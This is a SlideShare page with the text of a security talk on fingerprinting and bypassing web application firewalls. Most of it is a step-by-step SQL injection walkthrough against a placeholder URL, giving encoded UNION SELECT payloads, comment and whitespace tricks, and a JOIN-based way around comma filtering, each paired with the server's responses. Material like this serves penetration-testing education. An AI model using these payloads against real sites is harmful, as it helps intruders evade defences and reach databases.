SlideShare a Scribd company logo

Waf bypassing Techniques

Download as PPTX, PDF
Avinash Thapa
Avinash Thapa

General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.

Education
1 of 47
WAF BypassingTechniques
 Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India  Bug Hunter on Hackerone  CTF Author on Vulnhub.com  Some exploits and PoC on Exploit-db as well.  Passionate about Web Applications Security and Exploit Writing.
Agenda  Introduction to Web Applications Firewalls  Operation Modes  Vendors  Fingerprinting WAF  Ways to Bypass WAFs  Practical Cases for Bypassing  Conclusion
Introduction to Web Application Firewalls  Presents as Application Layer  Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers based upon their pre-defined signatures in a database.  Basic goal of WAF is to monitor and block the contents that violates pre-defined policy.  These pre-defined policies are patterns of user input which ends up in potential attack.  Understands HTTP and HTTPs traffic better than any traditional firewall.
Types of Operation Modes
Negative Mode A negative security model recognize attacks by relying on a database of expected attack signatures. Example: Do not allow in any page, any argument value (user input) which match potential XSS strings like <script>,</script>, String.fromCharCode, etc. Pros: ● Less time to implement. Cons: ● Less protection.
Positive Model  A positive security model enforces positive behaviour by learning the application logic and the building a security policy of valid known requests as a user interacts with the application. Example:  Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until 65535.  Using intval conditions on page. (Accepts only integers) Pros: ● Better performance (less rules). ● Less false positives. Cons: ● Much more time to implement. ● Some vendors provide “automatic learning mode”, they help, but are far from perfect, in the end, you always need a skilled human to review the policies
Mix Model  Combination of both positive and negative model.
Testing Environments  Google Chrome  Mozilla Firefox  Internet Explorer  Opera Browser
Products  F5 BIG IP WAF  Sucuri  Modsecurity  Imperva Incapsula  PHP-IDS (PHP Intrusion Detection System)  Quick Defense  AQTRONIX WebKnight (For IIS and based on ISAPI filters)  Barracuda WAF
Fingerprinting WAF Adds Cookie to the HTTP Communication.  For Citrix Netscaler WAF
Fingerprinting WAF  F5 BIG IP ASM
Fingerprinting WAF  On the basis of HTTP Response Other WAF’s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.
Fingerprinting WAF  Response for BIG F5
Fingerprinting WAF  Request and Response for ModSecurity Firewall Request:
Fingerprinting WAF  Request and Response for ModSecurity Firewall Response:
Fingerprinting WAF  Response for WebKnight Firewall Response:
Fingerprinting WAF  Response for WebKnight Firewall Response rendered on Browser
Automatic Fingerprinting WAF  Using Nmap Scripts nmap -p80 --script http-waf-detect <host>  Using WaFw00f.py Python Wafw00f.py –url <URL>
Techniques to Bypass WAFs  Bypassing WAF For SQL Injection Vulnerabilities  Bypassing WAF for XSS Issues  Bypassing WAF for LFI and RFI vulnerabilities.
General Techniques to bypass WAF  Null Character Injection  Mixed Case  Inline Comments  Chunked Requests  Buffer Overflow  HTTP Parameter Pollution  URL encoding  Keyword Splitting  Replaced Keywords  Ignoring Cookies  Using Data URIs  Header Injection
Bypassing WAF For SQL Injection Vulnerabilities
https://abc.com/index.php?id=1 Example 1 (Without WAF) ‘ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6 Example 1 (With WAF) https://abc.com/index.php?id=1 ‘ HTTP/1.1 403 Forbidden Error Or HTTP/1.1 406 Not Acceptable or HTTP/1.1 404 Not Found Or HTTP/1.1 500 Internal Server Error Or HTTP/1.1 400 Bad Request
Some recon on WAF Came to know Modsecurity is in action https://abc.com/index.php?id=1 “ HTTP/1.1 200 OK https://abc.com/index.php?id=1 %27 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for right syntax to use near '1’ ' at line 6 This technique is URL Encoding Some time you need to use: 1) Double URL Encoding :- %2527%27’ 2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)
https://abc.com/index.php?id=1 %27 ORDER BY 1%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Order’ keyword is Blocked ?? • ‘Order by ’ keyword is Blocked ?? • Any other alternative of Order by query ?? • Does Spaces are blocked Let’s Try 
https://abc.com/index.php?id=1 %27 ORDER %23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Order’ keyword is Blocked • Check again ‘order’ is blocked ?? https://abc.com/index.php?id=1 %27ORDER%23 HTTP/1.1 200 OK New Assumptions in mind • ‘Order’ keyword is not Blocked • What is blocked then ??? SPACES ARE BLOCKED
https://abc.com/index.php?id=1 %27 ORDER by 1 %23 HTTP/1.1 403 Forbidden https://abc.com/index.php?id=1 %27ORDERby1 %23 HTTP/1.1 200 OK No Assumptions in mind Because spaces are blocked only
Techniques to bypass spaces Using ‘+’ instead of space like:- order+by+1 (Mostly blocked) Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1 Using combination of inline comments and URL encoding instead of spaces like: • Order/%2a%2a/by/%2a%2a/1 • Order%2f**%2fby%2f**%2f1 Using combination of inline comments, URL encoding & Junk Characters instead of spaces like: • Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1 • Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
Techniques to bypass spaces Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01 Query will be  ORDER%0aby%0a1  ORDER%0bby%0b1  ORDER%0cby%0c1  ORDER%0Dby%0D1  ORDER%A0by%A01  ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1 %27/**/ORDER/**/by/**/1%23 HTTP/1.1 200 OK Let’s Suppose no. of columns are 3 https://abc.com/index.php?id=1 %27 UNION SELECT 1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Spaces’ are Blocked ??
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Spaces’ were bypassed using inline comments..…Still blocked??? • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
Techniques to Bypass Using Inline comments:  /!*50000UNION*/  /*!40000UNION*/  /*!00000UNION*/ If UNION is blocked Using URL Encoding Techniques:  %53nion  %2553nion  %55%4e%49%4f%4e (UNION) Double URL Encoding Triple URL Encoding
https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
https://abc.com/index.php?id=1 %27/**//*!50000UNION*/1,2,3%23 HTTP/1.1 200 OK https://abc.com/index.php?id=1 %27/**//*!50000SELECT*/1,2,3%23 HTTP/1.1 200 OK Assumptions in mind • ‘UNION’ keyword is NOT blocked. • ‘SELECT’ keyword is NOT blocked. • ‘Intergers’ are NOT blocked • ‘Commas’ are NOT blocked • Combination of “UNION SELECT” is blocked ? • “SELECT with Integers” are NOT blocked
Techniques to bypass combination of “union select” Using combination of inline comments and URL encoding : • /*!50000%55niOn*/ /*!50000%53eLECT*/ Using white spaces and URL encoding of comments (#) • Union%23%0aSELECT • Union%23%0bSELECT • Union%23%0cSELECT • Union%23%0DSELECT • Union%23%A0SELECT Using combination of inline comments and URL encoding : • /*!50000%55niOn*/ /*!50000%53eLECT*/
Techniques to bypass combination of “union select” Using Buffer Overflow UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT Some time need to increase the junk as per the requirement UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX%0ASELECT
Techniques to bypass combination of “union select” Using Distinct statement UNION DISTINCT SELECT Using Distinctrow statement UNION DISTINCTROW SELECT
https://abc.com/index.php?id=1 %27/**/UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23 HTTP/1.1 200 OK
Special Case : What if Commas got blocked ?
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is NOT blocked. • ‘SELECT’ keyword is NOT blocked. • ‘Intergers’ are NOT blocked • ‘Commas’ are blocked • Combination of “UNION SELECT” is NOT blocked ? • “SELECT with Integers” are NOT blocked Time to bypass commas “,”.
Basic Bypasses  URL Encoding - %2c  ,  Double URL Encoding - %252c  %2c  ,  Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
Basic Bypasses  URL Encoding - %2c  ,  Double URL Encoding - %252c  %2c  ,  Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
Advance way to bypass “Commas”  Using JOIN  JOIN used for columns as UNION is used for the rows  We have SELECT 1,2,3  SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
Advance way to bypass “Commas” https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/J OIN/**/(SELECT/**/2)b%23 HTTP/1.1 200 OK
Similar Approach for other Vulnerabilities  For XSS  For LFI / RFI DEMO TIME 
References  Images in slides 10,11,14,15,16,17  Taken from http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYB ALOCH.pdf Thank you..!

Recommended

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 

Recommended

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 

More Related Content

What's hot

Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 

What's hot (20)

SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 

Similar to Waf bypassing Techniques

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Using Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreUsing Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreJosh Sokol
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar GanievOWASP Russia
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)Wail Hassan
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Application Security Workshop
Application Security Workshop Application Security Workshop
Application Security Workshop Priyanka Aash
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 

Similar to Waf bypassing Techniques (20)

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Using Proxies To Secure Applications And More
